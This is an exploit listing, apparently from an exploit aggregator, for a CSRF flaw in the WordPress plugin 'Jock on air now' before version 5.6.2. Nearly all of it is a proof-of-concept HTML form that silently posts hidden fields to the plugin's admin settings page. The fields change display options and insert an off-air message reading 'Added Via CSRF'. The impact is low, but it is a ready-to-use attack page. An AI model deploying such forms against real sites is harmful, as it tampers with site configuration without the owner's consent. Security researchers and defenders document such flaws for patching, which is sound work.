Exploit for Jock on air now < 5.6.2 - Arbitrary Plugin's Settings Update via CSRF

Name: Exploit for Jock on air now < 5.6.2 - Arbitrary Plugin's Settings Update via CSRF
Rating: 5 (279 reviews)

2021-08-18 | CVSS 1.0

## https://sploitus.com/exploit?id=WPEX-ID:27428224-A1DA-432F-AC84-84B7DEB295DB
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=joan_settings" method="POST">
      <input type="hidden" name="joan_options[imagesOn]" value="yes" />
      <input type="hidden" name="joan_options[showUpcoming]" value="yes" />
      <input type="hidden" name="joan_options[offAirMessage]" value="Added Via CSRF" />
      <input type="hidden" name="shut-it-down" value="no" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>